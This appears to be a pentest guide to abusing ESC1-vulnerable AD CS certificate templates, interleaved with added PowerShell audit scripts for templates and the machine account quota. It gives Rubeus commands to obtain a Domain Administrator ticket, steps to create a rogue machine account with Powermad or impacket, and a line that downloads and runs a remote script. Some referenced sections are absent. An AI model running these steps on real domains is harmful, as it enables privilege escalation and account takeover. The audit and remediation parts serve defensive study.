ESC1 is a privilege escalation vulnerability in certificate templates. A template is affected when any user with enrollment rights can supply a subjectAltName (SAN) naming any other user or machine in Active Directory, and the Certificate Authority (CA) issues a certificate for that SAN. The requesting user thereby receives a certificate for the targeted account and can authenticate as that account with it.
Prerequisite: enrollment rights on the template are held by a principal we control or are a member of (for example, Domain Users).
Given this information, it is possible to abuse the ESC1 attack vector. As our user is a member of Domain Users we can request a certificate for any other user, ideally, a Domain Administrator.
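As an added audit example (not code from the original page), the following PowerShell enumerates the certificate templates in the Configuration partition and reports those that meet the ESC1 conditions described above: the enrollee supplies the subject (ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag), no manager approval, no authorized signatures, an authentication-capable EKU, and enrollment rights granted to a broad principal such as Domain Users or Domain Computers (the latter is the condition the machine-account sections below rely on). It assumes the RSAT ActiveDirectory module and read access to the Configuration naming context; the list of "broad" principals is an assumption to extend for your environment.

```powershell
# Added example, not part of the original page: audit certificate templates for the ESC1 conditions.
# Assumes the RSAT ActiveDirectory module and read access to the Configuration partition.
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext
$tplBase  = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"

# Flag bits and OIDs the checks rely on
$ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag: requester supplies subject/SAN
$PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag: CA manager approval required
$EnrollRightGuid = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$AuthEkus = @(
    '1.3.6.1.5.5.7.3.2',       # Client Authentication
    '1.3.6.1.4.1.311.20.2.2',  # Smart Card Logon
    '1.3.6.1.5.2.3.4',         # PKINIT Client Authentication
    '2.5.29.37.0'              # Any Purpose
)
# Principals treated as low-privileged for this audit (assumption; extend for your environment)
$BroadPrincipals = @('Domain Users', 'Domain Computers', 'Authenticated Users', 'Everyone')
$GenericAll    = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$ExtendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

$templates = Get-ADObject -SearchBase $tplBase -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties `
    'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature', 'pKIExtendedKeyUsage', 'nTSecurityDescriptor'

foreach ($t in $templates) {
    $suppliesSubject = ([int]$t.'msPKI-Certificate-Name-Flag' -band $ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $noApproval      = ([int]$t.'msPKI-Enrollment-Flag' -band $PEND_ALL_REQUESTS) -eq 0
    $noSignatures    = [int]$t.'msPKI-RA-Signature' -eq 0
    $ekus            = @($t.'pKIExtendedKeyUsage' | Where-Object { $_ })
    # A template with no EKU at all is usable for authentication, like Any Purpose
    $authEku         = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $AuthEkus -contains $_ })

    # Identities allowed to enroll: the Certificate-Enrollment right, all extended rights, or GenericAll
    $enrollers = $t.'nTSecurityDescriptor'.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and (
            (($_.ActiveDirectoryRights -band $GenericAll) -eq $GenericAll) -or
            ((($_.ActiveDirectoryRights -band $ExtendedRight) -ne 0) -and
             ($_.ObjectType -eq $EnrollRightGuid -or $_.ObjectType -eq [guid]::Empty))
        )
    } | ForEach-Object { $_.IdentityReference.Value }

    # Keep only enrollers that match one of the broad principals ("DOMAIN\Domain Users", "Everyone", ...)
    $broad = @($enrollers | Where-Object {
        $id = $_
        $BroadPrincipals | Where-Object { $id -eq $_ -or $id -like "*\$_" }
    } | Select-Object -Unique)

    if ($suppliesSubject -and $noApproval -and $noSignatures -and $authEku -and $broad.Count -gt 0) {
        [pscustomobject]@{
            Template       = $t.Name
            EKUs           = ($ekus -join ', ')
            BroadEnrollers = ($broad -join '; ')
        }
    }
}
```

Each template the script returns satisfies every ESC1 condition at once; fixing any one of them (clearing the supply-subject flag so the CA builds the SAN from AD, requiring CA manager approval, or removing the enrollment ACE for the broad group) closes the path. Templates where a broad group also holds WriteDacl or WriteOwner are a separate template-tampering concern and are not flagged here.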
```powershell
# Convert the certificate to PFX, optionally setting a password
& "C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in certificate.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out certificate.pfx

# If Base64 encoding the certificate (not required); Rubeus expects the PFX, not the PEM
[System.Convert]::ToBase64String((Get-Content -Path ".\certificate.pfx" -Encoding Byte)) | Write-Output
```

```bash
# Convert the certificate to PFX, optionally setting a password
openssl pkcs12 -in certificate.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out certificate.pfx

# If Base64 encoding the certificate (not required)
cat certificate.pfx | base64 -w 0
```
Take either the Base64 output or the certificate file path and use it with Rubeus to request a TGT for the target account.
```powershell
# Syntax (if a certificate password was specified)
Invoke-Rubeus -Command "asktgt /user:<DomainAdmin> /certificate:<Base64-Cert or path to PFX file> /password:<password> /aes256 /nowrap /getcredential"

# Syntax (certificate password not specified)
Invoke-Rubeus -Command "asktgt /user:<DomainAdmin> /certificate:<Base64-Cert or path to PFX file> /aes256 /nowrap /getcredential"
```

```
# Syntax (if a certificate password was specified)
Rubeus.exe asktgt /user:<DomainAdmin> /certificate:<Base64-Cert or path to PFX file> /password:<password> /aes256 /nowrap /getcredential

# Syntax (certificate password not specified)
Rubeus.exe asktgt /user:<DomainAdmin> /certificate:<Base64-Cert or path to PFX file> /aes256 /nowrap /getcredential
```
With a TGT for the impersonated user, either pass the ticket directly into the current session, or use createnetonly to create a new sacrificial logon session holding the impersonated user's ticket (preferred).
It's not uncommon for domain computers to have enrollment rights over templates.
To perform this attack you will need to be running a shell in the context of a domain computer (SYSTEM, or a TGT in memory for a computer account; if running as a local administrator, Certify will attempt to elevate to SYSTEM).
Repeat the steps in the section "Windows Abuse" from the point of requesting the certificate to complete the attack path.
ESC1 - Windows - Machine Account Quota
The section "ESC1 - Machine Account" above presents an overview of abusing an ESC1-vulnerable template by using local administrative or SYSTEM privileges on the current system.
Another way to leverage this vulnerability when "Domain Computers" have enrollment rights is by adding a new system to Active Directory.
Powermad can be used to enumerate for and add a new machine account to the domain.
```powershell
# Load Powermad into memory
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1)

# Enumerate the Machine Account Quota
Get-MachineAccountQuota

# Add a new machine account
New-MachineAccount -MachineAccount <ComputerName>

# New logon session as the machine account (machine accounts cannot log on interactively, so use /netonly)
runas.exe /netonly /user:security.local\EvilComputer$ cmd.exe

# Run Certify (without the /machine flag)
Invoke-Certify request /ca:<CAName> /template:<Template> /altname:<UserToImpersonate>
```
Repeat the steps in the section "Windows Abuse" from the point of requesting the certificate to complete the attack path.
If a template has enrollment rights for domain computers, a machine account can be used to request a certificate to perform the attack. This requires having a hash or password for a machine account or, if the domain's machine account quota is greater than zero, adding a new machine ourselves to complete the attack.
```bash
# If we do not have existing credentials for a machine account,
# maybe we can add a new machine account to the domain
impacket-addcomputer security.local/truth:'Password1!' -computer-name 'EvilComputer$' -computer-pass 'Password123!' -method SAMR -dc-ip 10.10.10.100
```
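The machine-account-quota path in this section is visible to defenders: the quota is a single domain attribute, and computer objects that were joined through the quota (rather than by an account holding explicit Create Child rights) carry the creator's SID in mS-DS-CreatorSID. The following is an added example, not code from the original page or from Powermad/Impacket, that reads the quota, lists quota-created machine accounts with their creator, and shows the remediation (commented out). It assumes the RSAT ActiveDirectory module and read access to the domain.

```powershell
# Added example, not part of the original page: check ms-DS-MachineAccountQuota and
# list computer objects created through the quota. Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$maq = (Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
Write-Host "ms-DS-MachineAccountQuota for $($domain.DNSRoot): $maq (default is 10; 0 disables self-service joins)"

# Computer objects added by a non-administrator via the quota have mS-DS-CreatorSID populated;
# machines joined by an account with explicit Create Child rights do not.
Get-ADComputer -LDAPFilter '(mS-DS-CreatorSID=*)' -Properties 'mS-DS-CreatorSID', 'whenCreated' |
    ForEach-Object {
        # The attribute is stored as a binary SID
        $sid = New-Object System.Security.Principal.SecurityIdentifier($_.'mS-DS-CreatorSID', 0)
        $creator = $sid.Value
        try { $creator = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{
            Computer  = $_.Name
            Created   = $_.whenCreated
            CreatedBy = $creator
        }
    } | Sort-Object Created -Descending | Format-Table -AutoSize

# Remediation: set the quota to 0 so only principals with explicit rights can join machines
# Set-ADDomain -Identity $domain.DistinguishedName -Replace @{'ms-DS-MachineAccountQuota' = 0}
```

A computer object whose CreatedBy is an ordinary user account, especially one created shortly before a certificate request for a privileged user, is the artifact this attack path leaves in the directory; combining this listing with the template audit above tells you whether the quota is actually reachable from a template that Domain Computers can enroll in.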